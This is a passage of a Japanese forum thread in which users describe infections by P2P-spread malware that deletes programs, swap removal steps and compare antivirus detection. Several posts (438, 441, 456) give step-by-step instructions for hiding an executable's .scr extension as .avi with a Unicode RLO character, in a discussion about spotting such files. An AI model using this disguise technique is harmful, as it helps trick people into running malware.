WINDOWSフォルダ内にあるfromJASRAC.midを消す
2
レジストリ エディタを起動して
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
にあるfromJASRACを右クリックして削除する。
これでおk
398:334
06/12/11 08:24:00 gkG31qdA
>>394
そうなのか…。
でもAdministratorファイルも別にあるのはどういうことなんでしょう…。
399:名無しさん
06/12/11 19:28:18 C3a3+ggQ
>>398
複数あるは怪しすぎ
素直にリカバリした方が良い
400:名無しさん
06/12/11 22:51:02 TB2ZHclH
>>397
サンクス!
401:まりぃ@ブラッディ ◆JcP82GanDE
06/12/11 22:52:27 HiFanjxa
サークルK
402:名無しさん
06/12/12 23:53:08 BSzNhMwf
ugu-virus-ver4ってのに感染した。
exeファイル消去されてアプリケーションみんなやられた。
リカバリするしかないのかな?
ワクチンは出てないよね…。
403:肉茎平均
06/12/13 10:46:07 /PR+nCop
金子氏有罪かぁ
まあ、想定内だけどな
404:名無しさん
06/12/14 18:27:39 13gtVWOj
油断しててやっちまったぜ。
「あら、まだP2P起動るわねw 今から0.5秒以内に止めないとぶち殺しますわよ...。」
こんなのに引っかかった。
Down直下とProgram Filesの一部が消えた。シャットダウンしたからこれだけで済んだのかも。
バスターじゃ反応しないとの事だったので、NortonAntiVirus2006に変えてスキャン。何も検出しませんでした。
405:名無しさん
06/12/14 18:30:52 13gtVWOj
あ、あとC直下にUGXDってフォルダができた。
中身は何もなし。
どっかにFTPつないでなんか送ってるのかな?
406:名無しさん
06/12/14 18:47:24 4Lohayxm
シャットダウンしてなかったらUGXDフォルダに何かのファイルを作られていたかもしれないな
407:名無しさん
06/12/14 18:48:43 13gtVWOj
>>406
そうだねえ。たぶん。
とりあえず20番と21番のポート塞いでみた。
408:名無しさん
06/12/14 21:12:47 13gtVWOj
ためしに再度DLしたらTrojan.Haradongとして検出されました。
409:名無しさん
06/12/14 22:24:20 DWfp0AYe
URLリンク(vista.jeez.jp)
この画像かな
410:名無しさん
06/12/14 22:26:13 13gtVWOj
>>409
そそ。それそれ。
411:名無しさん
06/12/14 22:39:41 C+ZIfBTa
ちょwwwww秋子さん.....www
412:名無しさん
06/12/15 15:51:00 4ZXEf4Dw
正月休みにはどんなウイルスが流行るか考えようぜ
413:名無しさん
06/12/16 11:44:31 fIDFVgzp
>>412
カスラック
414:名無しさん
06/12/16 15:33:27 0xNE0s21
>>402
同じ状況です。こりゃやられたなって感じだわ。
瞬時にやべぇとプログラム強制終了しまくって、
152GBのHDDの内、10GB程「bmp」ファイルに書き換えられますた。
あとprogram files のプログラム中、いくつか削除された。
→特にサイズが軽い再生プレイヤーや2ちゃんねるブラウザだとか。
途中で気付かなければお陀仏なのか?
C:\ 直下に『ugu-virus-ver4』が作成。bmpあったが削除。
C:\System Volume Information\recent にC:\ugu-virus-ver4の
ショートカット作成
以下、青髪の女が笑顔でこんな目をしながら「^^」←アニメ詳しくないから分からん。
教えてくり。
あら、まだP2P起動してるわねw
今から0.5秒以内に止めないとブチ殺しますよ.....。
『殺』のところだけ赤文字。
415:414
06/12/16 15:36:45 0xNE0s21
あとノートンやカスペ等のオンラインスキャンが出来なくなる!?
タスクマネージャーのsystem idle process がCPU99%もってかれて、スキャンできん。
どうかどうか対策教えてくだされ。。。。
416:名無しさん
06/12/16 16:10:18 tnyVDgkF
ほんのちょこっと上くらい見ろよ
417:名無しさん
06/12/16 16:30:38 zVLHMDoV
>>415
System Idle ProcessはCPUを使ってない時はそうなるのが普通。異常ではない。
オンラインスキャンができないのは、IEの設定でActiveXコントロールの実行を無効にしてるからではないだろうか。
418:nu- IE版 ◆Ujnu.4men.
06/12/18 09:39:44 nHxYnVho
.scrをIgnoreに入れるなりすればいいんじゃないの?
なんでみんな引っかかってるんだ
419:名無しさん
06/12/18 10:46:51 6lxWJZ0l
>>418
シーッ!
420:名無しさん
06/12/18 12:06:40 dvDVUaUF
.scr.com.exeは無視リストに入れておるよ
421:名無しさん
06/12/18 13:54:38 OpS02zxW
でも無視されない....orz
422:名無しさん
06/12/18 14:27:04 UjM1v6WW
おちん○ん切除しちゃうょ。←これも亜種かな。
423:名無しさん
06/12/18 17:48:43 OpS02zxW
○の中の文字入れて全文完成させよww
424:nu- IE版 ◆Ujnu.4men.
06/12/18 17:48:45 nHxYnVho
入れても食らうのか
コワイモンダナ
そういえば今後はアラビア語で拡張子偽装ってのが流行りそうだなぁ
425:名無しさん
06/12/18 18:10:58 Of4U/pBU
アラビア語のは、Windowsにアラビア語を入れていなければ大丈夫なんじゃなかった?
426:名無しさん
06/12/19 01:36:35 QSOb9i+H
エラゴンでやってしまいました。
京都○○からのメッセージが表示され、レジストリ検索をするので、
強制終了するとPCが破壊されますうんぬんのメッセージがでましたが、
強制終了、再起動すると、ProgramFiles配下のexeが何個か削除。
C直下にフォルダが作成され、中身はDownloadフォルダの画像がひとつ。
ファイル全部消して、OSインストールしなおしました。
もうnyからは撤退します。・・・ビクビク。。
427:名無しさん
06/12/19 10:38:28 gy0yLtrC
○○の文字ってなんなの?
まさか「アニ」が入るのか!?
428:名無しさん
06/12/20 17:39:38 FNvBDwvK
>>409の画像のウィルスに引っかかった場合
bmpになったファイルを削除して
Cドライブに直に置いてある『KANOX』ってフォルダーを消せばいいんじゃない?
429:名無しさん
06/12/20 19:21:03 Ne09Nsif
そのフォルダの中身は調べたか??
430:名無しさん
06/12/20 20:11:30 TL8WtZEm
>>421
検索に反映 おしてるか
ねらーって無視リストいれろいれろ、言うわりには検索には反映ボタンを確認しろって岩根ーな
そこおさなきゃ何の意味もないのに
431:名無しさん
06/12/20 20:13:53 TL8WtZEm
>>425
それはたぶん2000だけ
これからは、アイコンを本当によく見なきゃだめ
いつも最後に拡張子がくると思っていたが、真ん中にあったりする可能性あり・・・・
こえーぞー
[アニメ] ~タイトル~ 第01話 [CRCs.0895].avi
これscrだったら感染
432:名無しさん
06/12/20 22:55:16 qCoqFZXF
なんでそれで感染させられるんか
いまいちわからん。。。
433:名無しさん
06/12/20 23:24:04 G+TReax6
極窓をすり抜けないと踏まないんじゃないか
434:名無しさん
06/12/21 00:32:39 DFnEq9JU
>>432
俺もそこまでわからない
でも、試してみればそういうファイルが作れるんだよ
極窓 全部使うか?
それよりもルールを作ってWを実行させないようにした方がよい
無視リストは消えたも同然のじだいだな
うぐぅウイルスって所詮は ・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・scrでしょ。
たぶん3倍5倍それぐらい増えるんじゃないだろうか・・・怖い
435:名無しさん
06/12/21 00:35:08 DFnEq9JU
>>432
よくみな scrが入ってるだろ
436:名無しさん
06/12/21 01:33:27 lfFCXO9k
>>431
scrファイルをその名前に変えてみたが、aviとして認識されるよ。
実行してもプレイヤーがエラー吐いて終わり。
scrとしての動作はしなかったが。
437:名無しさん
06/12/21 03:22:34 DFnEq9JU
>>436
たぶんやり方が悪いんじゃないの?
種類自体どうなってるの?
それにどうやって真ん中に持っていくのか俺わかんないもん
438:名無しさん
06/12/21 15:26:39 lfFCXO9k
>>437
あーできたわ。UnicodeのRLOを挿入するという方法だね。
これでアイコンも偽装すれば、ファイル名とアイコンでは判断できなくなるね。
「ファイルの種類」の表記は偽装できないみたいだから、「ファイルの種類」を見て判断すれば良さそう。
ちなみにP2Pソフトで共有できるか試したら、nyとMXでは共有できなかったが、洒落だと共有できた。
439:名無しさん
06/12/21 18:49:40 DFnEq9JU
>>438
nyでもできると思う
MXは知らないけど
どうやって拡張子を真ん中に持っていくの
ワードとかだと.cod にはできるんだけどこれを真ん中に持っていく方法がわからない
ファイルの種類では実行するでしょ、禁止のルール作ればそれですむじゃん
440:名無しさん
06/12/21 18:58:32 U0LPL8bD
URLリンク(up2.viploader.net)
441:名無しさん
06/12/21 20:07:27 lfFCXO9k
>>439
例えば>>431のファイルを作る場合、まず
"[アニメ] ~タイトル~ 第01話 [Civa.[5980.sCR"
という名前にしておいて、ファイル名編集状態で"C"と"i"の間にRLOを挿入してファイル名編集を完了する。
RLO挿入は"C"と"i"の間にカーソルを置いた状態で右クリックして、「Unicode制御文字の挿入」→RLOを選択する。
442:名無しさん
06/12/21 20:18:10 lfFCXO9k
>>439
一つしか試してないから全てかは判らないけど、nyとMXでは共有できなかったよ。
nyやMXが、Unicodeを含むファイル名をサポートしてないのか、セキュリティー面を考慮した上での機能なのかは不明だけど。
まぁ自分で試してみてくれ。
443:名無しさん
06/12/21 22:58:21 DFnEq9JU
>>442
とりあえずありがとう
444:名無しさん
06/12/22 02:42:33 MMW4GAW0
叩いてしまった…orz
BLACK LAGOON 第24話
Windows Media Player
実行時エラー'53'
ファイルが見つかりません。
C直下にはUGUEXTRAと中にKAMON.bmpが出来てたけど
System Volume Informationには_restoreファイルなし。
これはアウト?。セーフ?。
…念のためOS入れなおすか。
445:444
06/12/22 03:24:28 MMW4GAW0
KAMON.bmpじゃなくKAMOM.bmpですね。
思った以上に慌ててます。
今のトコdownフォルダ内に変化なし。wmpも問題なしですが
入れ直し準備中。
446:名無しさん
06/12/22 04:48:01 p4sFhJhf
>>442
直接は流せないけどrarかなんかで圧縮すればできるらしい。
447:名無しさん
06/12/22 23:58:31 vXwZGite
今日、アニメKanon12話を落としてスキャンしたにもかかわらず勢いでsrc開いてしまったらやられますた。京都府警サイバーなんちゃらと出て強制終了したら懲役4年以下または、罰金200万円以下と・・・
448:名無しさん
06/12/23 03:06:00 F/a15+hz
>>444
>これはアウト?。セーフ?。
ヨヨイノヨイ!
449:名無しさん
06/12/23 06:30:18 u2uVdOup
>>444
まだ未確認の動作をする亜種でなければ、C直下に作られたフォルダと、
システム復元ファイルを削除すれば、駆除したことになるだろう。
念のため>>353のオンラインスキャンと、>>338の手順でスタートアップのチェックをしたほうが良い。
Program Files下のファイルを消されている場合は、必要に応じてソフトを再インストールする。
あと、これに引っ掛かったということは、セキュリティーソフトを入れてないか、
対応していないセキュリティーソフトを使ってると思うので、
>>369あたりを参考にして、セキュリティーソフトの導入、変更をお勧めする。
450:名無しさん
06/12/23 11:58:09 C9ZmoClb
消されたファイルはどうする?
451:名無しさん
06/12/23 17:46:41 jXweVWfT
src開いて、OS再インストールしてない人で
Windowsメッセンジャー繋がりにくくなったって人います?
452:名無しさん
06/12/23 17:57:07 B8HJB/F3
>>451
(´・ω・) カワイソス
453:444
06/12/23 21:43:02 AwB2YCCS
用事の合間の作業だったんで入れ直しに手間取りました。
空白末尾に拡張子ファイルに引っかかるなんてありえねぇと普段思ってた口でしたので
内心もうボロボロ…。疲れてたにしてもちょっと酷い。
スクリーンセーバーが立ち上がらずエラー報告があがった原因は
油断を促す物なのか、単なる失敗作だったのか、
downフォルダ(.SCR叩いちゃった場所)をCとは別のHDDに割り当ててたおかげとか。
まぁ最悪(未知の亜種)を考えて処置しておけば後悔も少ないかという事で…。
>>448
なんか和みますわw。
>>449
使ってたのはバスターでした。ご忠告ありがとうございます。
OSのクリーンインストしてしまってたので
せっかくの助言のいくつかを上手く生かす事が出来ずに申し訳ありません。
セキュリティーソフトに関しては早速検討してみます。
454:名無しさん
06/12/24 05:56:57 LC8i0Dch
>>451
つながりにくくはならなかっただけど、メッセのアイコンが勝手に別のに変わったりしたから再インストしたよ
455:名無しさん
06/12/25 12:43:17 L8DTuQPf
URLリンク(www.bleepingcomputer.com)
456:名無しさん
06/12/25 19:56:11 yKWhhPMr
>>446しかしこれって圧縮したらほとんど怖くないんじゃないか・・。
洒落は可能でMXとnyは圧縮しないと駄目でOK?
「ファイルの種類」の表記は偽装できないみたいだから、「ファイルの種類」を見て判断すれば良さそう。
ちなみにP2Pソフトで共有できるか試したら、nyとMXでは共有できなかったが、洒落だと共有できた。
439 名前: 名無しさん 投稿日: 2006/12/21(木) 18:49:40 ID:DFnEq9JU
>>438
nyでもできると思う
MXは知らないけど
どうやって拡張子を真ん中に持っていくの
ワードとかだと.cod にはできるんだけどこれを真ん中に持っていく方法がわからない
ファイルの種類では実行するでしょ、禁止のルール作ればそれですむじゃん
441 名前: 名無しさん [sage] 投稿日: 2006/12/21(木) 20:07:27 ID:lfFCXO9k
>>439
例えば>>431のファイルを作る場合、まず
"[アニメ] ~タイトル~ 第01話 [Civa.[5980.sCR"
という名前にしておいて、ファイル名編集状態で"C"と"i"の間にRLOを挿入してファイル名編集を完了する。
RLO挿入は"C"と"i"の間にカーソルを置いた状態で右クリックして、「Unicode制御文字の挿入」→RLOを選択する。
457:名無しさん
06/12/26 05:39:56 HhnJPQiw
>>456
んだね。
圧縮すると、Unicodeに対応してない解凍ソフトで解凍した場合、
偽装が無効になったり、解凍できなかったりして偽装がバレる可能性が高い。
それに実際に圧縮してみると判るが、このavi偽装ウイルスを圧縮すると、1MBくらいにしかならず、
ファイルサイズでも偽装であれことがバレる。
458:名無しさん
06/12/26 19:07:37 XF5YB8tC
URLリンク(karainfo.hp.infoseek.co.jp)
459:名無しさん
06/12/27 00:11:28 kiUDGb6I
>>458
そのソフト自体がウイルスだったりはしないかな?
460:名無しさん
06/12/27 02:33:58 oeGtxBep
>>459
怪しさ満点ではある
461:名無しさん
06/12/27 02:47:41 vq4i1Rfd
使い方ワカンネ
462:名無しさん
06/12/28 05:42:53 tFQOw07G
今のところ検出できるのは
ノートン、カスペ、F-Secure、NOD32、AVG、a2
検出できないのは
バスター、マカフィ、avast!、AntiVir
他にも確認できたのがあれば追加よろ。
463:名無しさん
06/12/28 06:29:17 d/CjPcah
>>462
は、どういういみだよ
あれウイルスなのか???????
464:名無しさん
06/12/28 07:23:32 Pos99W2t
つーかこのスレにいる奴どっから来た奴だよ
ロビーで感染した固定が名無し潜伏してるのか?
465:うんこの王様ワビ入れんかい
06/12/28 08:16:19 C5uL0/R+
虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部
虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー
虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部
虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー
虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部
虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー虹の街倶楽部うっふぁー
466:名無しさん
06/12/29 00:50:56 IgJ3nzTO
>>458
これコンピュータウイルス作成幇助でタイーホじゃね?
467:名無しさん
06/12/29 05:37:48 lTSe1pXN
>>464
ごめん2ch用語わかんねから
もう少し詳しく和kりやすく
468:名無しさん
06/12/29 05:38:41 lTSe1pXN
>>466
だってウイルスじゃねーだろ
ある種止めようとしている時点で立派とも言えると思うだよ
469:名無しさん
06/12/29 06:54:45 SOf7/dyw
おまえらキモヲタはwinnyなどをして著作権侵害するから
あかんのちゃうか?これはもう自業自得としかいいようがないね。
470:名無しさん
06/12/29 11:16:46 1YZvoUNw
>>469
9割ぐらいあってる!
471:名無しさん
06/12/29 14:28:14 AyM9nwH7
>>466-468
だからお前らいったい何処からこのスレに来たんだよ
472:名無しさん
06/12/29 22:47:35 1YZvoUNw
>>471
だからんな事言われてもねらーにどう答えたらいいのかわからね
日本ですけど
473:名無しさん
06/12/31 01:04:42 bU/VbbGH
「Winny使用=著作権侵害」ではないと言ってる人もいるけど
これにひっかかる人は確実に著作権侵害に当たる動画を
落としてると思う。
474:名無しさん
06/12/31 07:34:37 mKXbwDPY
>>473
同意
しかし落とすだけが著作権侵害に当たるかはまた、弁護士検事などがウダウダ言って変わるんです
落とせばキャッシュ化されてupしてるだろうけど
枠を0にしても無駄だろうなぁ。キンタマなどは効果有り?
475:原田義士
06/12/31 19:14:18 a4s+Bxy4
2006年も終わりですなーwww
それでは皆様よいお年を.....うぐぅ
電通大の原田義士
476:名無しさん
07/01/06 00:50:25 AdyGNRLU
感染した人誰か来て
477:名無しさん
07/01/09 01:59:31 eEDAKZkW
とりあえず消すもんは消して、復元ファイルもできてなかったからよかった。
これでおkだよな?
再起動してもフォルダもできてなかったし
478:名無しさん
07/01/09 02:54:37 djerfkK1
まぁ俺は再インスコしたがな。
OKかどうかはまずお前が人柱になって試してくれ。
で、勿論結果は報告な。
479:名無しさん
07/01/10 13:06:22 +m+4GabL
昨日うぐぅに引っかかった。
武装錬金の15話だったかな。
起動したらコードギアス?のキャラとp2pユーザーに告ぐ~~
みたいな台詞の画像が出てきてnyのフォルダ内がjpgにされていった。
速攻でプロセスは終了させたがprogram fileのexeがそれなりに消えてた。
あとやっぱりC直下にCOEDGEASSっていうフォルダが新規にできてたけど
すぐに終了させたからか中身は空。
再インスコしないで大丈夫かね?
480:名無しさん
07/01/10 16:42:12 Lcl6f94e
>>479
>>92や>>449あたり
481:名無しさん
07/01/10 17:44:44 /quYySIh
URLリンク(vista.jeez.jp)
多分この画像
482:名無しさん
07/01/10 18:18:16 +m+4GabL
>>480
試してみる。サンクス。
>>481
あーそれそれ。
483:名無しさん
07/01/13 23:14:44 h3Uks1eA
デスノート~.avi .scr を間違えてダブルクリックしてしまったorz
以下の対処を行ったんですが、問題ないですか。
・OSはw2k
・起動したのは、月宮が居たのでうぐぅウィルス
・タスクマネージャからプロセスを強制終了→C直下に「MI3」と言うフォルダが出来ているのを確認。
・中身はうぐぅを起動した直後のスクリーンショット、IP.txt、LOOP.txtの3種。2種のtxtにはunable~ www.yahoo~という英文のみ。
・デスノ~avi.scrが強制終了後「taskmgr.exe(アイコンはメディア)」に変更しているのを確認
・NAV2006でファイルスキャンを掛けるがヒットせず。完全スキャンもヒットせず。
・カスペルスキーオンラインスキャンを行うと「Trojan.Win32.KillFiles.ki」として検出。
・疑いのあるtaskmgr.exe削除
・ノートンをアンインストしてカスペアンチウィルス体験版インスコ。
・完全スキャン(Lv中)と完全スキャン(Lv高)を行う。既に削除していたため検出せず。
改行多いって言われたんで、下に続きます。
484:483
07/01/13 23:17:05 h3Uks1eA
>>483の続き
・System Volume Informationが各ドライブに1個有ったので、アクセス可能にしてないよう確認。
・どのフォルダにも「tracking.log」しか無い事を確認。
・MI3フォルダを削除。→カスペスキャン(Lv高)
・スタートアップフォルダを確認。一応問題なしと判断。
・スタートアップ関係のレジストリ?は驚速メモリの機能で確認。
・メディアプレイヤ、MSNメッセンジャー等のexeが削除されているのが分かる。(総数24のexeが無かった)
・この書き込みに至る。
こんな感じで対処しました。
今回ノートンは当てにならなかったのでカスペに乗り換え予定です。
485:名無しさん
07/01/13 23:44:20 RsrB7T8b
ノートンは検出したけどな。2007だからだろうか。
486:名無しさん
07/01/13 23:56:33 iZWRZVW9
>>483
俺は再インストールしたよ。
俺もNAV2006は反応しなかった
487:名無しさん
07/01/14 00:05:34 rzQBixyw
>>483
俺も気味悪いから再インストール。
おかげでOSが軽くなったよw
488:483@携帯
07/01/14 00:50:30 W7vr5laP
ウィルスのせいかカスペのせいか、別の原因なのか
ネット周りが重たくなっているのでDのバックアップ
とったら再インスコした方が良いですね
今月わめどに頑張るか。
489:名無しさん
07/01/14 15:29:02 fhwFFMoJ
馬鹿じゃねーのか
感染しないように色々対策あるだろ
少なくとも2種類はある
490:
07/01/14 15:48:35 o4kuVrH9
491:名無しさん
07/01/15 03:39:46 w+kpMzfM
>>489
多いのか少ないのかわかんね~よ
492:名無しさん
07/01/19 00:42:33 i/kIeyB/
うぐぅ
493:名無しさん
07/01/21 22:32:09 7rZVbH+b
a
494:名無しさん
07/01/23 02:04:49 789aBbAY
URLリンク(2log.blog9.fc2.com)
495:名無しさん
07/01/28 03:28:49 6zRIrvWx
s
496:名無しさん
07/02/01 23:14:17 V2NW/c54
a
497:名無しさん
07/02/02 16:02:08 MIBvkAp8
s
498:名無しさん
07/02/08 08:06:08 DRb6uEup
aa
499:名無しさん
07/02/10 18:05:08 vUiblGS2
kkkkkkkkkkkkkkkkkkkk